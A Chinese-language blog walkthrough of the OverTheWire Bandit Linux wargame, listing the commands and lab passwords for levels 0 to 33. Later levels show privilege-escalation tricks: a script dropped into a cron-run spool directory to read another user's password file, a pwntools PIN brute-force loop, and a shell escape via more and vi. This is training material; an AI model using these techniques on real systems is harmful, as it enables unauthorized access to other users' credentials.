Wargames--bandit 通关记录

bandit,一个练习linux命令的网站,随便玩一下

Level 0

  • ssh指定端口用户名直接登陆
1
2
ssh bandit0@bandit.labs.overthewire.org -p 2220
密码: bandit0

Level 0 → Level 1

  • 查看readme获取下一关的登陆密码
1
2
bandit0@bandit:~$ cat readme
boJ9jbbUNNfktd78OOpsqOltutMc3MY1

Level 1 → Level 2

  • 用上一关获得的密码ssh登陆,然后查看-文件
1
2
3
4
5
6
7
ssh bandit1@bandit.labs.overthewire.org -p 2220
密码:boJ9jbbUNNfktd78OOpsqOltutMc3MY1

bandit1@bandit:~$ ls
-
bandit1@bandit:~$ cat ./-
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9

Level 2 → Level 3

  • 用上一关获得的密码ssh登陆,然后查看spaces in this filename文件
1
2
3
4
5
6
7
ssh bandit2@bandit.labs.overthewire.org -p 2220
密码:CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9

bandit2@bandit:~$ ls
spaces in this filename
bandit2@bandit:~$ cat ./spaces\ in\ this\ filename
UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK

Level 3 → Level 4

  • inhere里面隐藏了一个文件,用ls -a即可查看
1
2
3
4
5
6
7
8
bandit3@bandit:~$ ls
inhere
bandit3@bandit:~$ cd inhere/
bandit3@bandit:~/inhere$ ls
bandit3@bandit:~/inhere$ ls -a
. .. .hidden
bandit3@bandit:~/inhere$ cat .hidden
pIwrPrtPN36QITSp3EQaw936yaFoFgAB

Level 4 → Level 5

  • inhere里面有十个文件,要先判断哪个是我们可读的
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
bandit4@bandit:~$ ls
inhere
bandit4@bandit:~$ cd inhere/
bandit4@bandit:~/inhere$ ls
-file00 -file02 -file04 -file06 -file08
-file01 -file03 -file05 -file07 -file09
bandit4@bandit:~/inhere$ file ./*
./-file00: data
./-file01: data
./-file02: Non-ISO extended-ASCII text
./-file03: data
./-file04: data
./-file05: data
./-file06: data
./-file07: ASCII text
./-file08: data
./-file09: data
bandit4@bandit:~/inhere$ cat ./-file07
koReBOKuIDDepwhWk7jZC0RTdopnAYKh

Level 5 → Level 6

  • 有20个文件夹,我们需要找出大小为1033bytes的可读文件,可以利用du命令
1
2
3
4
5
6
7
8
9
10
11
12
bandit5@bandit:~$ ls
inhere
bandit5@bandit:~$ cd inhere/
bandit5@bandit:~/inhere$ ls
maybehere00 maybehere04 maybehere08 maybehere12 maybehere16
maybehere01 maybehere05 maybehere09 maybehere13 maybehere17
maybehere02 maybehere06 maybehere10 maybehere14 maybehere18
maybehere03 maybehere07 maybehere11 maybehere15 maybehere19
bandit5@bandit:~/inhere$ du ./* -a -b | grep 1033
1033 ./maybehere07/.file2
bandit5@bandit:~/inhere$ cat ./maybehere07/.file2
DXjZPULLxYr17uwoI01bNLQbtFemEgo7

Level 6 → Level 7

  • 需要在服务器找所属用户为bandit7,用户组为bandit6,size为33bytes的文件,利用find命令,2>/dev/null将报错信息重定向到“黑洞”
1
2
3
4
5
bandit6@bandit:~$ ls
bandit6@bandit:~$ find / -user bandit7 -group bandit6 -size 33c 2>/dev/null
/var/lib/dpkg/info/bandit7.password
bandit6@bandit:~$ cat /var/lib/dpkg/info/bandit7.password
HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs

Bandit Level 7 → Level 8

  • 密码在data.txt文件里的单词millionth后面
1
2
3
4
bandit7@bandit:~$ ls
data.txt
bandit7@bandit:~$ cat data.txt | grep 'millionth'
millionth cvX2JJa4CFALtqS87jk27qwqGhBM9plV

Level 8 → Level 9

  • 需要找出data.txt文件中唯一出现的一行,sort命令 将文件进行排序 uniq -u命令只显示单一行
1
2
bandit8@bandit:~$ sort data.txt | uniq -u
UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR

Level 9 → Level 10

  • 找出‘=’开头的字符即可
1
2
3
4
5
6
7
bandit9@bandit:~$ ls
data.txt
bandit9@bandit:~$ strings data.txt | grep '=='
========== the
========== password
========== is
,Y========== truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk

Level 10 → Level 11

  • base64字符串,直接base64 -d 解码
1
2
3
4
bandit10@bandit:~$ ls
data.txt
bandit10@bandit:~$ base64 -d data.txt
The password is IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR

Level 11 → Level 12

  • data内容被替换了,每个字母被替换到后13个位置,所以用tr替换命令来还原
1
2
3
4
5
6
bandit11@bandit:~$ ls
data.txt
bandit11@bandit:~$ cat data.txt
Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh
bandit11@bandit:~$ cat data.txt | tr 'a-zA-Z' 'n-za-mN-ZA-M'
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu

Level 12 → Level 13

  • 给了个hex dump文件,需要先拷贝到tmp下自己的文件夹然后再用xxd命令转换成二进制文件,然后是gzip bzip2 tar压缩文件的解压
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
bandit12@bandit:~$ ls
data.txt
bandit12@bandit:~$ mkdir /tmp/qwe123
bandit12@bandit:~$ cp data.txt /tmp/qwe123
bandit12@bandit:~$ cd /tmp/qwe123
bandit12@bandit:/tmp/qwe123$ ls
data.txt
bandit12@bandit:/tmp/qwe123$ cat data.txt
00000000: 1f8b 0808 d6e4 b85b 0203 6461 7461 322e .......[..data2.
...
00000260: 39cf be46 0200 00 9..F...
bandit12@bandit:/tmp/qwe123$ xxd -r data.txt data
bandit12@bandit:/tmp/qwe123$ file data
data: gzip compressed data, was "data2.bin", last modified: Sat Oct 6 16:37:42 2018, max compression, from Unix
bandit12@bandit:/tmp/qwe123$ mv data data.gz
bandit12@bandit:/tmp/qwe123$ gzip -d data.gz
bandit12@bandit:/tmp/qwe123$ ls
data data.txt
bandit12@bandit:/tmp/qwe123$ file data
data: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/qwe123$ mv data data.bz2
bandit12@bandit:/tmp/qwe123$ bzip2 -d data.bz2
bandit12@bandit:/tmp/qwe123$ ls
data data.txt
bandit12@bandit:/tmp/qwe123$ file data
data: gzip compressed data, was "data4.bin", last modified: Sat Oct 6 16:37:42 2018, max compression, from Unix
bandit12@bandit:/tmp/qwe123$ mv data data.gz
bandit12@bandit:/tmp/qwe123$ gzip -d data.gz
bandit12@bandit:/tmp/qwe123$ file data
data: POSIX tar archive (GNU)
bandit12@bandit:/tmp/qwe123$ tar -xvf data
data5.bin
bandit12@bandit:/tmp/qwe123$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@bandit:/tmp/qwe123$ tar -xvf data5.bin
data6.bin
bandit12@bandit:/tmp/qwe123$ tar -xvf data6.bin
data8.bin
bandit12@bandit:/tmp/qwe123$ file data8.bin
data8.bin: gzip compressed data, was "data9.bin", last modified: Sat Oct 6 16:37:42 2018, max compression, from Unix
bandit12@bandit:/tmp/qwe123$ mv data8.bin data.gz
bandit12@bandit:/tmp/qwe123$ gzip -d data.gz
gzip: data already exists; do you wish to overwrite (y or n)? y
bandit12@bandit:/tmp/qwe123$ ls
data data5.bin data6.bin data.txt
bandit12@bandit:/tmp/qwe123$ cat data
The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL

Level 13 → Level 14

  • 需要用私钥文件去登陆bandit14用户从而查看密码
1
2
3
4
5
bandit13@bandit:~$ ls
sshkey.private
bandit13@bandit:~$ ssh -i sshkey.private bandit14@localhost
bandit14@bandit:~$ cat /etc/bandit_pass/bandit14
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e

Level 14 → Level 15

  • 用nc连接本地30000端口并发送本关密码
1
2
3
4
bandit14@bandit:~$ nc localhost 30000
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr

Level 15 → Level 16

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
bandit15@bandit:~$ openssl s_client -connect localhost:30001
CONNECTED(00000003)
depth=0 CN = localhost
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = localhost
verify return:1
---
...
Start Time: 1538922837
Timeout : 7200 (sec)
Verify return code: 18 (self signed certificate)
Extended master secret: yes
---
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd

closed

Level 16 → Level 17

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
bandit16@bandit:~$ nmap localhost -p 31000-32000

Starting Nmap 7.40 ( https://nmap.org ) at 2018-10-07 16:49 CEST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00015s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
31046/tcp open unknown
31518/tcp open unknown
31691/tcp open unknown
31790/tcp open unknown
31960/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
bandit16@bandit:~$ openssl s_client -connect localhost:31790
CONNECTED(00000003)
...
Correct!
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

closed

#将私钥保存成在tmp下的目录,然后用私钥登陆bandit17再查看密码,要将私钥文件的权限设置成700,否则无法登陆
bandit16@bandit:/tmp/qwe$ chmod 700 1.private
bandit16@bandit:/tmp/qwe$ ssh -i 1.private bandit17@localhost
bandit17@bandit:~$ cat /etc/bandit_pass/bandit17
xLYVMN9WE5zQ5vHacb0sZEVqbrp7nBTn

Level 17 → Level 18

  • 用diff直接比较出不同即可
1
2
3
4
5
bandit17@bandit:~$ diff passwords.new passwords.old
42c42
< kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
---
> f7UGxW7wGeltEOOtypYI8ECR3UVR2Jw0

Level 18 → Level 19

  • ssh连上去会断开连接,可以在ssh后面加上想要执行的命令就会返回结果
1
2
3
4
5
☁  ~  ssh bandit18@bandit.labs.overthewire.org -p 2220 cat readme
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit18@bandit.labs.overthewire.org's password:
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x

Level 19 → Level 20

  • 需要以bandit20的身份去读取密码,关于setuid
1
2
3
4
5
6
7
8
9
bandit19@bandit:~$ ls -l
-rwsr-x--- 1 bandit20 bandit19 7500 Oct 7 18:43 bandit20-do
bandit19@bandit:~$ cat /etc/bandit_pass/bandit20
cat: /etc/bandit_pass/bandit20: Permission denied
bandit19@bandit:~$ ./bandit20-do
Run a command as another user.
Example: ./bandit20-do id
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j

Level 20 → Level 21

  • 需要我们监听一个端口并在传输中输入上一关的密码,然后用suconnect连接我们的端口就出来密码.
1
2
3
4
5
6
7
bandit20@bandit:~$ nc -l -p 9999 < /etc/bandit_pass/bandit20 &
[1] 32140
bandit20@bandit:~$ ./suconnect 9999
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
[1]+ Done nc -l -p 9999 < /etc/bandit_pass/bandit20

Level 21 → Level 22

  • 查看cronjob_bandit22的定时任务
1
2
3
4
5
6
7
8
9
10
11
12
13
bandit21@bandit:~$ ls -l /etc/cron.d/
-rw-r--r-- 1 root root 120 Oct 7 18:43 cronjob_bandit22
-rw-r--r-- 1 root root 122 Oct 7 18:43 cronjob_bandit23
-rw-r--r-- 1 root root 120 Oct 7 18:43 cronjob_bandit24
bandit21@bandit:~$ cat /etc/cron.d/cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

Level 22 → Level 23

  • 查看cronjob_bandit23的定时任务
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
bandit22@bandit:~$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@bandit:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:~$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:~$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

Level 23 → Level 24

  • cronjob_bandit24的定时任务是每分钟执行/var/spool/bandit24中的所有文件,60s内没有就删除所有文件,所以可以写个输出密码的shell脚本去让服务器执行

  • shell脚本等号左右不能有空格

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
timeout -s 9 60 ./$i
rm -f ./$i
fi
done

bandit23@bandit:~$ cd /tmp/qwe123
bandit23@bandit:/tmp/qwe123$ chmod 777 /tmp/qwe123
bandit23@bandit:/tmp/qwe123$ vi 1.sh
bandit23@bandit:/tmp/qwe123$ cat 1.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 >> /tmp/qwe123/pass
bandit23@bandit:/tmp/qwe123$ chmod 777 1.sh
bandit23@bandit:/tmp/qwe123$ cp 1.sh /var/spool/bandit24/
bandit23@bandit:/tmp/qwe123$ cat pass
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Level 24 → Level 25

  • 需要写个脚本爆破pincode
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
bandit24@bandit:/tmp/qwe123$ cat 1.py
from pwn import *
context.log_level = 'debug'
p = remote('localhost',30002)
p.recvuntil('space.\n')
for i in range(8,10):
for j in range(10):
for k in range(10):
for l in range(10):
pincode = str(i) + str(j) + str(k) + str(l)
p.sendline('UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ ' + pincode)
data = p.recvline()
if 'Wrong' not in data:
print 'pincode: ',pincode
print p.recv()
exit()
bandit24@bandit:/tmp/qwe123$ python 1.py
...
[DEBUG] Received 0x55 bytes:
'Correct!\n'
'The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG\n'
'\n'
'Exiting.\n'
pincode: 9342
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

Level 25 → Level 26

  • 用私钥ssh登陆不上,题目说shell有问题,于是查看passwd文件发现shell不是/bin/sh,发现shell会自动执行more命令然后exit,所以可以利用more时候可以在vi模式下用e导入文件来查看密码,要将终端缩小才能触发more效果
1
2
3
4
5
6
7
8
9
10
bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh

export TERM=linux

more ~/text.txt
exit 0
bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost

  • 5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z

Level 26 → Level 27

  • 跟上一关一样利用more和vi,但是没有权限直接读取密码,需要先getshell,然后再跟前面一样利用程序查看密码
1
2
3
4
5
6
7
8
#vi模式下
:set shell=/bin/sh
:sh

$ ls
bandit27-do text.txt
$ ./bandit27-do cat /etc/bandit_pass/bandit27
3ba3118a22e93127a4ed485be72ef5ea

Level 27 → Level 28

  • 直接git clone下载文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
bandit27@bandit:~$ cd /tmp/qwe123
bandit27@bandit:/tmp/qwe123$ ssh://bandit27-git@localhost/home/bandit27-git/repo
-bash: ssh://bandit27-git@localhost/home/bandit27-git/repo: No such file or directory
bandit27@bandit:/tmp/qwe123$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
Cloning into 'repo'...
...
Receiving objects: 100% (3/3), done.
bandit27@bandit:/tmp/qwe123$ ls
1.py 1.sh pass repo
bandit27@bandit:/tmp/qwe123$ cd repo/
bandit27@bandit:/tmp/qwe123/repo$ ls
README
bandit27@bandit:/tmp/qwe123/repo$ cat README
The password to the next level is: 0ef186ac70e04ea33b4c1853d2526fa2

Level 28 → Level 29

  • git clone下载文件发现没有密码,然后git log查看日志看到修复泄漏的信息这一注释,于是git show查看历史提交信息发现密码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
bandit28@bandit:/tmp/qwe123$ git clone ssh://bandit28-git@localhost/home/bandit28-git/repo
Cloning into 'repo'...
...
Resolving deltas: 100% (2/2), done.
bandit28@bandit:/tmp/qwe123$ ls
1.py 1.sh pass rep1 repo
bandit28@bandit:/tmp/qwe123$ cd repo
bandit28@bandit:/tmp/qwe123/repo$ ls
README.md
bandit28@bandit:/tmp/qwe123/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: xxxxxxxxxx

  • bbc96594b4e001778eee9975372716b2

Level 29 → Level 30

  • 跟前面一样下载文件然后got log,git show都没发现东西,查看一看分支,有一个可能是开发者的dev分支,切换到开发分支发现有东西dd data needed for development注释,git show一下发现密码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
bandit29@bandit:/tmp/qwe123$ git clone ssh://bandit29-git@localhost/home/bandit29-git/repo
Cloning into 'repo'...
...
Resolving deltas: 100% (2/2), done.
bandit29@bandit:/tmp/qwe123$ cd repo
bandit29@bandit:/tmp/qwe123/repo$ ls
README.md
bandit29@bandit:/tmp/qwe123/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: <no passwords in production!>

  • 5b90576bedb2cc04c86a9e924ce42faf

Level 30 → Level 31

  • git show-ref 可以清晰地查看引用信息,然后发现了一个secret,查看获得密码
1
2
3
4
5
6
7
8
bandit30@bandit:/tmp/qwe123$ git clone ssh://bandit30-git@localhost/home/bandit30-git/repo
bandit30@bandit:/tmp/qwe123/repo$ git show-ref
ba0247c6246270e4dce77e87901daef35bb74861 refs/heads/master
ba0247c6246270e4dce77e87901daef35bb74861 refs/remotes/origin/HEAD
ba0247c6246270e4dce77e87901daef35bb74861 refs/remotes/origin/master
f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea refs/tags/secret
bandit30@bandit:/tmp/qwe123/repo$ git show f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea
47e603bb428404d265f59c42920d81e5

Level 31 → Level 32

  • 远程提交一个key.txt就有密码了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
bandit31@bandit:/tmp/qwe123$ git clone ssh://bandit31-git@localhost/home/bandit31-git/repo
bandit31@bandit:/tmp/qwe123$ cd repo
bandit31@bandit:/tmp/qwe123/repo$ ls
README.md
bandit31@bandit:/tmp/qwe123/repo$ cat README.md
This time your task is to push a file to the remote repository.

Details:
File name: key.txt
Content: 'May I come in?'
Branch: master
bandit31@bandit:/tmp/qwe123/repo$ echo May I come in? >> key.txt
bandit31@bandit:/tmp/qwe123/repo$ git add -f key.txt
bandit31@bandit:/tmp/qwe123/repo$ git commit
bandit31@bandit:/tmp/qwe123/repo$ git push

  • 56a9bf19c63d650ce78e6ec0354ee45e

Level 32 → Level 33

  • 先提前写好一个名字为大写TEST的shell脚本,然后利用linux下的?模糊匹配来执行/tmp/123/TSET脚本,然后查看密码
1
2
3
4
5
6
7
8
9
bandit31@bandit:~$ cd /
bandit31@bandit:/$ mkdir /tmp/123
bandit31@bandit:/$ cd /tmp/123
bandit31@bandit:/tmp/123$ ls
bandit31@bandit:/tmp/123$ vi TEST
bandit31@bandit:/tmp/123$ chmod 777 TEST
bandit31@bandit:/tmp/123$ cat TEST
#!/bin/bash
bash

  • c9c3199ddf4121b10cf581a98d51caee

Level 33 → Level 34

  • At this moment, level 34 does not exist yet.